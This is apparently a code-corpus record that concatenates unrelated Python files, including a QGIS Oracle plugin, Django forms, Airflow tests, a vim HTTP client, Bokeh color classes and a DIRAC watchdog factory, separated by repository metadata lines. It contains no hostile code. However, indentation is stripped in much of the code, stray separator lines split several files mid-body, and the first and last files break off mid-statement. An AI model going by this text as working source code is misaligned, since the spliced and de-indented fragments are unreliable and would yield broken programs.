from PyQt4.QtGui import *
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, \
Database, Schema, Table, VectorTable, TableField, TableConstraint, \
TableIndex, TableTrigger, TableRule
try:
from . import resources_rc
except ImportError:
pass
from ..html_elems import HtmlParagraph, HtmlList, HtmlTable
from qgis.core import QgsCredentials
def classFactory():
return OracleDBPlugin
class OracleDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/oracle/icon")
@classmethod
def typeName(self):
return 'oracle'
@classmethod
def typeNameString(self):
return 'Oracle Spatial'
@classmethod
def providerName(self):
return 'oracle'
@classmethod
def connectionSettingsKey(self):
return '/Oracle/connections'
def connectToUri(self, uri):
self.db = self.databasesFactory(self, uri)
if self.db:
return True
return False
def databasesFactory(self, connection, uri):
return ORDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/{0}/{1}".format(
self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(
self.tr('There is no defined database connection "{}".'.format(
conn_name)))
from qgis.core import QgsDataSourceURI
uri = QgsDataSourceURI()
settingsList = ["host", "port", "database", "username", "password"]
host, port, database, username, password = map(
lambda x: settings.value(x, "", type=str), settingsList)
# qgis1.5 use 'savePassword' instead of 'save' setting
savedPassword = settings.value("save", False, type=bool) or \
settings.value("savePassword", False, type=bool)
        # get all of the connection options
useEstimatedMetadata = settings.value(
"estimatedMetadata", False, type=bool)
uri.setParam('userTablesOnly', unicode(
settings.value("userTablesOnly", False, type=bool)))
uri.setParam('geometryColumnsOnly', unicode(
settings.value("geometryColumnsOnly", False, type=bool)))
uri.setParam('allowGeometrylessTables', unicode(
settings.value("allowGeometrylessTables", False, type=bool)))
uri.setParam('onlyExistingTypes', unicode(
settings.value("onlyExistingTypes", False, type=bool)))
settings.endGroup()
uri.setConnection(host, port, database, username, password)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
err = u""
try:
return self.connectToUri(uri)
except ConnectionError as e:
err = unicode(e)
# ask for valid credentials
max_attempts = 3
for i in range(max_attempts):
(ok, username, password) = QgsCredentials.instance().get(
uri.connectionInfo(False), username, password, err)
if not ok:
return False
uri.setConnection(host, port, database, username, password)
try:
self.connectToUri(uri)
except ConnectionError as e:
if i == max_attempts - 1: # failed the last attempt
raise e
err = unicode(e)
continue
QgsCredentials.instance().put(
uri.connectionInfo(False), username, password)
return True
return False
class ORDatabase(Database):
def __init__(self, connection, uri):
self.connName = connection.connectionName()
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return OracleDBConnector(uri, self.connName)
def dataTablesFactory(self, row, db, schema=None):
return ORTable(row, db, schema)
def vectorTablesFactory(self, row, db, schema=None):
return ORVectorTable(row, db, schema)
def info(self):
from .info_model import ORDatabaseInfo
return ORDatabaseInfo(self)
def schemasFactory(self, row, db):
return ORSchema(row, db)
def columnUniqueValuesModel(self, col, table, limit=10):
l = u""
if limit:
l = u"WHERE ROWNUM < {:d}".format(limit)
con = self.database().connector
# Prevent geometry column show
tableName = table.replace(u'"', u"").split(u".")
if len(tableName) == 0:
tableName = [None, tableName[0]]
colName = col.replace(u'"', u"").split(u".")[-1]
if con.isGeometryColumn(tableName, colName):
return None
query = u"SELECT DISTINCT {} FROM {} {}".format(col, table, l)
return self.sqlResultModel(query, self)
def sqlResultModel(self, sql, parent):
from .data_model import ORSqlResultModel
return ORSqlResultModel(self, sql, parent)
def toSqlLayer(self, sql, geomCol, uniqueCol,
layerName=u"QueryLayer", layerType=None,
avoidSelectById=False, filter=""):
from qgis.core import QgsMapLayer, QgsVectorLayer
uri = self.uri()
con = self.database().connector
uri.setDataSource(u"", u"({})".format(sql), geomCol, filter, uniqueCol.strip(u'"'))
if avoidSelectById:
uri.disableSelectAtId(True)
provider = self.dbplugin().providerName()
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
# handling undetermined geometry type
if not vlayer.isValid():
wkbType, srid = con.getTableMainGeomType(
u"({})".format(sql), geomCol)
uri.setWkbType(wkbType)
if srid:
uri.setSrid(unicode(srid))
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
return vlayer
def registerDatabaseActions(self, mainWindow):
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Re-connect"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Database"), self.reconnectActionSlot)
|
if self.schemas():
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Create schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.createSchemaActionSlot)
|
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Delete (empty) schema"), self)
mainWindow.registerAction(action, Q
|
stuaxo/pyHotReload
|
setup.py
|
Python
|
bsd-2-clause
| 2,321
| 0.004308
|
import glob
import os
import shutil
from distutils import sysconfig
from setuptools import setup, Command
from setuptools.command.install import install
here=os.path.dirname(os.path.abspath(__file__))
site_packages_path = sysconfig.get_python_lib()
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
CLEAN_FILES = './build ./dist ./*.pyc ./*.tgz ./*.egg-info'.split(' ')
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
    def run(self):
global here
for path_spec in self.CLEAN_FILES:
# Make paths absolute and relative to this path
abs_paths = glob.glob(os.path.normpath(os.path.join(here, path_spec)))
|
for path in [str(p) for p in abs_paths]:
if not path.startswith(here):
# Die if path in CLEAN_FILES is absolute + outside this directory
raise ValueError("%s is not a path inside %s" % (path, here))
print('removing %s' % os.path.relpath(path))
shutil.rmtree(path)
long_description="""
pyhotreload allows you to patch a system while it is running.
"""
setup(
name='pyhotreload',
version='0.0.1',
    description="patch a system while it's running",
long_description=long_description,
cmdclass={
'clean': CleanCommand,
},
url='https://github.com/mdsitton/pyHotReload/',
author='Matthew Sitton',
author_email='[email protected]',
license='',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
#'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='hot reload',
install_requires=[],
packages=['hotreload'],
)
|
rbuffat/pyidf
|
tests/test_compliancebuilding.py
|
Python
|
apache-2.0
| 1,041
| 0.003842
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.compliance_objects import ComplianceBuilding
log = logging.getLogger(__name__)
class TestComplianceBuilding(unittest.TestCase):
    def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_compliancebuilding(self):
pyidf.validation_level = ValidationLevel.error
obj = ComplianceBuilding()
# real
var_building_rotation_for_appendix_g = 1.1
obj.building_rotation_for_appendix_g = var_building_rotation_for_appendix_g
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
        with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertAlmostEqual(idf2.compliancebuildings[0].building_rotation_for_appendix_g, var_building_rotation_for_appendix_g)
|
scott48074/Restorative-Justice-App
|
app/csv_handler.py
|
Python
|
mit
| 1,556
| 0.003856
|
#!/usr/bin/env python3
"""
Open a csv file with each row as a list; all the row-lists are contained in a
list. In preparation for entry into the database the data is cleaned. This
includes validating the headers and stripping and lowering the values.
"""
import csv
HEADERS = ['case number', 'case occurred from date', 'case occurred incident type', 'case ori',
'case subject age', 'case subject custody status', 'case subject global subject',
'case subject global subject address', 'case subject global subject address apartment',
'case subject global subject address city', 'case subject global subject address state',
'case subject global subject address zip',
'case subject global subject date of birth',
'case subject global subject primary phone number',
'case subject global subject race', 'case subject global subject sex',
           'case subject type', 'reporting district']
def open_csv(path):
    # Open the csv file, lower and strip all the values, and make sure the csv
    # is in the expected format.
with open(path) as csvfile:
reader = list(csv.reader(csvfile, delimiter=','))
rows = [[val.strip().lower() for val in row] for row in reader]
if rows.pop(0) != HEADERS:
|
return False
return rows
def write_receipt(path, rows):
# Write the receipt to csv file.
with open(f'{path}/receipt.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(rows)
def main():
pass
if __name__ == '__main__':
main()
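# A minimal usage sketch; 'export.csv' and the output directory '.' below are
# hypothetical placeholders, not values used by this module.
def _example_usage():
    rows = open_csv('export.csv')   # returns False when the headers do not match
    if rows:
        write_receipt('.', rows)    # writes ./receipt.csv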
|
RetroMelon/PatchWords
|
patchwords_project/patchwords/forms.py
|
Python
|
mit
| 1,944
| 0.013374
|
from django import forms
from registration.forms import RegistrationForm
from django.contrib.auth.models import User
from models import UserProfile
from models import *
class Registration(RegistrationForm):
picture = forms.ImageField(required=False)
bio = forms.CharField(widget=forms.Textarea(),required=False)
date_of_birth = forms.DateField(input_formats=['%d/%m/%Y'],required=False)
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class UserForm(forms.ModelForm):
username = forms.CharField(required=False)
class Meta:
model = User
fields = ('username','email',)
class UserProfileForm(forms.ModelForm):
GENDER_CHOICES = (
("Male", "Male"),
        ("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class Meta:
model = UserProfile
fields = ('picture','bio','gender')
class ParagraphForm(forms.ModelForm):
content = forms.CharField(max_length=200, help_text="Write your paragraph!")
choices = (
(True, 'yes'),
(False, 'no'))
end = forms.ChoiceField(choices=choices, widget=forms.RadioSelect)
class Meta:
model = Paragraph
exclude = ('story', 'parent', 'author','created_datetime')
class StoryForm(forms.ModelForm):
title = forms.CharField(max_length=100, help_text='Title', required = True)
#category = forms.ModelChoiceField(queryset=Category.objects.all().order_by('title'), help_text = "Category", required = True)
cat = forms.CharField(required = True)
text = forms.CharField(max_length=140, help_text="First Paragraph", required = True)
class Meta:
model = Story
exclude = ('created_datetime', 'author', 'slug', 'category')
|
malmiron/incubator-airflow
|
tests/contrib/hooks/test_azure_data_lake_hook.py
|
Python
|
apache-2.0
| 5,649
| 0.00354
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
from airflow import configuration
from airflow import models
from airflow.utils import db
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
db.merge_conn(
models.Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant",
"account_name": "accountname"})
)
)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_conn(self, mock_lib):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
from azure.datalake.store import core
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.connection, core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
        assert mock_filesystem.glob.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLUploader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_uploader.assert_called_once_with(hook.connection,
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLDownloader',
autospec=True)
|
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
                           nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_downloader.assert_called_once_with(hook.connection,
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_with('file_path/*')
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_with('file_path/some_folder/')
if __name__ == '__main__':
unittest.main()
|
aquach/vim-http-client
|
plugin/http_client.py
|
Python
|
mit
| 8,172
| 0.005996
|
import json
import re
import requests
from_cmdline = False
try:
__file__
from_cmdline = True
except NameError:
pass
if not from_cmdline:
import vim
METHOD_REGEX = re.compile('^(GET|POST|DELETE|PUT|HEAD|OPTIONS|PATCH) (.*)$')
HEADER_REGEX = re.compile('^([^()<>@,;:\<>/\[\]?={}]+):\\s*(.*)$')
VAR_REGEX = re.compile('^# ?(:[^: ]+)\\s*=\\s*(.+)$')
GLOBAL_VAR_REGEX = re.compile('^# ?(\$[^$ ]+)\\s*=\\s*(.+)$')
FILE_REGEX = re.compile("!((?:file)|(?:(?:content)))\((.+)\)")
JSON_REGEX = re.compile("(javascript|json)$", re.IGNORECASE)
verify_ssl = vim.eval('g:http_client_verify_ssl') == '1'
def replace_vars(string, variables):
for var, val in variables.items():
string = string.replace(var, val)
return string
def is_comment(s):
return s.startswith('#')
def do_request(block, buf):
variables = dict((m.groups() for m in (GLOBAL_VAR_REGEX.match(l) for l in buf) if m))
variables.update(dict((m.groups() for m in (VAR_REGEX.match(l) for l in block) if m)))
block = [line for line in block if not is_comment(line) and line.strip() != '']
if len(block) == 0:
print('Request was empty.')
return
method_url = block.pop(0)
method_url_match = METHOD_REGEX.match(method_url)
if not method_url_match:
print('Could not find method or URL!')
return
method, url = method_url_match.groups()
url = replace_vars(url, variables)
url = url.strip()
headers = {}
while len(block) > 0:
header_match = HEADER_REGEX.match(block[0])
if header_match:
|
block.pop(0)
header_name, header_value = header_match.groups()
headers[header_name] = replace_vars(header_value, variables)
else:
break
data = [ replace_vars(l, variables) for l in block ]
files = None
if all([ '=' in l for l in data ]):
# Form data: separate entries into data dict, and files dict
key_value_pairs = dict([ l.split('=', 1) for l in data ])
|
def to_file(expr):
type, arg = FILE_REGEX.match(expr).groups()
arg = arg.replace('\\(', '(').replace('\\)', ')')
return open(arg, 'rb') if type == 'file' else (arg)
files = dict([(k, to_file(v)) for (k, v) in key_value_pairs.items() if FILE_REGEX.match(v)])
data = dict([(k, v) for (k, v) in key_value_pairs.items() if not FILE_REGEX.match(v)])
else:
# Straight data: just send it off as a string.
data = '\n'.join(data)
if not verify_ssl:
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
json_data = None
if headers.get('Content-Type') == 'application/json':
json_data = json.loads(data)
data = None
response = requests.request(method, url, verify=verify_ssl, headers=headers, data=data, files=files, json=json_data)
content_type = response.headers.get('Content-Type', '').split(';')[0]
response_body = response.text
if JSON_REGEX.search(content_type):
content_type = 'application/json'
try:
response_body = json.dumps(
json.loads(response.text), sort_keys=True, indent=2,
separators=(',', ': '),
ensure_ascii=vim.eval('g:http_client_json_escape_utf')=='1')
except ValueError:
pass
display = (
response_body.split('\n') +
['', '// status code: %s' % response.status_code] +
['// %s: %s' % (k, v) for k, v in response.headers.items()]
)
return display, content_type
# Vim methods.
def vim_filetypes_by_content_type():
return {
'application/json': vim.eval('g:http_client_json_ft'),
'application/xml': 'xml',
'text/html': 'html'
}
BUFFER_NAME = '__HTTP_Client_Response__'
def find_block(buf, line_num):
length = len(buf)
is_buffer_terminator = lambda s: s.strip() == ''
block_start = line_num
while block_start > 0 and not is_buffer_terminator(buf[block_start]):
block_start -= 1
block_end = line_num
while block_end < length and not is_buffer_terminator(buf[block_end]):
block_end += 1
return buf[block_start:block_end + 1]
def open_scratch_buffer(contents, filetype):
previous_window = vim.current.window
existing_buffer_window_id = vim.eval('bufwinnr("%s")' % BUFFER_NAME)
if existing_buffer_window_id == '-1':
if vim.eval('g:http_client_result_vsplit') == '1':
split_cmd = 'vsplit'
else:
split_cmd = 'split'
vim.command('rightbelow %s %s' % (split_cmd, BUFFER_NAME))
vim.command('setlocal buftype=nofile nospell')
else:
vim.command('%swincmd w' % existing_buffer_window_id)
vim.command('set filetype=%s' % filetype)
write_buffer(contents, vim.current.buffer)
if vim.eval('g:http_client_focus_output_window') != '1':
vim.current.window = previous_window
def do_request_from_buffer():
win = vim.current.window
line_num = win.cursor[0] - 1
block = find_block(win.buffer, line_num)
result = do_request(block, win.buffer)
if result:
response, content_type = result
vim_ft = vim_filetypes_by_content_type().get(content_type, 'text')
open_scratch_buffer(response, vim_ft)
def write_buffer(contents, buffer):
if vim.eval('g:http_client_preserve_responses') == '1':
if len(buffer):
buffer[0:0] = [""]
buffer[0:0] = contents
vim.command('0')
else:
buffer[:] = contents
# Tests.
def run_tests():
import json
def extract_json(resp):
return json.loads(''.join([ l for l in resp[0] if not l.startswith('//') ]))
def test(assertion, test):
print('Test %s: %s' % ('passed' if assertion else 'failed', test))
if not assertion:
raise AssertionError
resp = extract_json(do_request([
'# comment',
'# :a=barf',
'GET http://httpbin.org/headers',
'X-Hey: :a',
'# comment'
], []))
test(resp['headers']['X-Hey'] == 'barf', 'Headers are passed with variable substitution.')
resp = extract_json(do_request([
'# :a = barf',
'GET http://httpbin.org/get?data=:a'
], []))
test(resp['args']['data'] == 'barf', 'GET data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'some data'
], []))
test(resp['data'] == 'some data', 'POST data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
], []))
test(resp['form']['forma'] == 'a', 'POST form data is passed.')
resp = extract_json(do_request([
'POST http://$global/post',
'forma=a',
'formb=b',
], [ '# $global = httpbin.org']))
test(resp['form']['forma'] == 'a', 'Global variables are substituted.')
import os
from tempfile import NamedTemporaryFile
SAMPLE_FILE_CONTENT = 'sample file content'
temp_file = NamedTemporaryFile(delete = False)
temp_file.write(SAMPLE_FILE_CONTENT)
temp_file.close()
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!file(%s)" % temp_file.name,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as path are sent properly.')
test(not 'formc' in resp['form'], 'File not included in form data.')
os.unlink(temp_file.name)
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!content(%s)" % SAMPLE_FILE_CONTENT,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as content are sent properly.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
"c=!content(foo \\(bar\\))",
], []))
test(resp['files']['c'] == 'foo (bar)', 'Escaped parenthesis should be unescaped during request')
if from_cmdline:
run_tests()
|
rwl/PyCIM
|
CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcAC3A.py
|
Python
|
mit
| 3,453
| 0.01448
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcAC3A(CorePowerSystemResource):
def __init__(self, ta=0.0, ka=0.0, kd=0.0, se1=0.0, kc=0.0, se2=0.0, te=0.0, tf=0.0, tb=0.0, tc=0.0, vamax=0.0, kf=0.0, vemin=0.0, ke=0.0, vfemax=0.0, tr=0.0, e2=0.0, e1=0.0, kn=0.0, vamin=0.0, kr=0.0, efdn=0.0, *args, **kw_args):
"""Initialises a new 'ExcitationSystemsExcAC3A' instance.
@param ta:
@param ka:
@param kd:
@param se1:
@param kc:
@param se2:
@param te:
@param tf:
@param tb:
@param tc:
@param vamax:
@param kf:
@param vemin:
@param ke:
@param vfemax:
@param tr:
@param e2:
@param e1:
@param kn:
@param vamin:
@param kr:
@param efdn:
"""
self.ta = ta
self.ka = ka
self.kd = kd
self.se1 = se1
        self.kc = kc
self.se2 = se2
self.te = te
self.tf = tf
self.tb = tb
self.tc = tc
|
self.vamax = vamax
self.kf = kf
self.vemin = vemin
self.ke = ke
self.vfemax = vfemax
self.tr = tr
self.e2 = e2
self.e1 = e1
self.kn = kn
self.vamin = vamin
self.kr = kr
self.efdn = efdn
super(ExcitationSystemsExcAC3A, self).__init__(*args, **kw_args)
_attrs = ["ta", "ka", "kd", "se1", "kc", "se2", "te", "tf", "tb", "tc", "vamax", "kf", "vemin", "ke", "vfemax", "tr", "e2", "e1", "kn", "vamin", "kr", "efdn"]
_attr_types = {"ta": float, "ka": float, "kd": float, "se1": float, "kc": float, "se2": float, "te": float, "tf": float, "tb": float, "tc": float, "vamax": float, "kf": float, "vemin": float, "ke": float, "vfemax": float, "tr": float, "e2": float, "e1": float, "kn": float, "vamin": float, "kr": float, "efdn": float}
_defaults = {"ta": 0.0, "ka": 0.0, "kd": 0.0, "se1": 0.0, "kc": 0.0, "se2": 0.0, "te": 0.0, "tf": 0.0, "tb": 0.0, "tc": 0.0, "vamax": 0.0, "kf": 0.0, "vemin": 0.0, "ke": 0.0, "vfemax": 0.0, "tr": 0.0, "e2": 0.0, "e1": 0.0, "kn": 0.0, "vamin": 0.0, "kr": 0.0, "efdn": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
philippjfr/bokeh
|
bokeh/colors/color.py
|
Python
|
bsd-3-clause
| 5,085
| 0.00885
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from bokeh.util.api import public, internal ; public, internal
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Public API
#-----------------------------------------------------------------------------
@public((1,0,0))
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
@public((1,0,0))
def clamp(value, maximum=None):
        ''' Clamp numeric values to be non-negative and, optionally, less than a
        given maximum.
Args:
value (float) :
A number to clamp.
            maximum (float, optional) :
                A max bound to clamp to. If None, there is no upper bound,
and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
@public((1,0,0))
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
@public((1,0,0))
def darken(self, amount):
''' Darken (reduce the luminance) of this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
@public((1,0,0))
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
@public((1,0,0))
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
@public((1,0,0))
def lighten(self, amount):
''' Lighten (increase the luminance) of this color.
Args:
amount (float) :
                Amount to increase the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
@public((1,0,0))
|
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
@public((1,0,0))
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
@public((1,0,0))
def to_rgb(self):
        ''' Create a new RGB color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Internal API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
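# A minimal usage sketch, assuming the concrete RGB subclass from
# bokeh.colors.rgb (which implements the abstract methods above); the values
# are illustrative:
#     from bokeh.colors.rgb import RGB
#     red = RGB(255, 0, 0)
#     darker = red.darken(0.2)     # luminance reduced by 0.2, clamped at 0
#     lighter = red.lighten(0.2)   # luminance increased by 0.2, clamped at 1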
|
mialinx/testenv
|
testenv/contrib/memcached.py
|
Python
|
mit
| 510
| 0.005882
|
# -*- coding: utf-8 -*-
from .. import server, utils
class Memcached(server.Server):
binary = 'memcached'
def init(self, **kwargs):
self.binary = utils.find_binary(kwargs.get('memcached_bin', self.binary))
        assert 'ip' in kwargs, "memcached server requires <ip> option"
        self.ip = kwargs['ip']
        assert 'port' in kwargs, "memcached server requires <port> option"
        self.port = kwargs['port']
        self.command = [ self.binary, '-l', self.ip, '-p', self.port ]
|
andresailer/DIRAC
|
WorkloadManagementSystem/JobWrapper/WatchdogFactory.py
|
Python
|
gpl-3.0
| 2,478
| 0.033495
|
""" The Watchdog Factory instantiates a given Watchdog based on a quick
determination of the local operating system.
"""
__RCSID__ = "$Id$"
import re
import platform
from DIRAC import S_OK, S_ERROR, gLogger
class WatchdogFactory( object ):
#############################################################################
def __init__(self):
""" Standard constructor
"""
self.version = platform.uname()
self.log = gLogger.getSubLogger( 'WatchdogFactory' )
self.watchDogsLocation = 'DIRAC.WorkloadManagementSystem.JobWrapper'
#############################################################################
  def getWatchdog( self, pid, exeThread, spObject, jobCPUTime, memoryLimit, processors = 1, jobArgs = {} ):
    """ This method returns the Watchdog instance corresponding to the local OS. The Linux watchdog is returned by default.
"""
if re.search( 'Darwin', self.version[0] ):
localOS = 'Mac'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
# elif re.search( 'Windows', self.version[0] ):
# localOS = 'Windows'
# self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
else:
localOS = 'Linux'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
subClassName = "Watchdog%s" % ( localOS )
try:
wdModule = __import__( self.watchDogsLocation + '.%s' % subClassName, globals(), locals(), [subClassName] )
except ImportError as e:
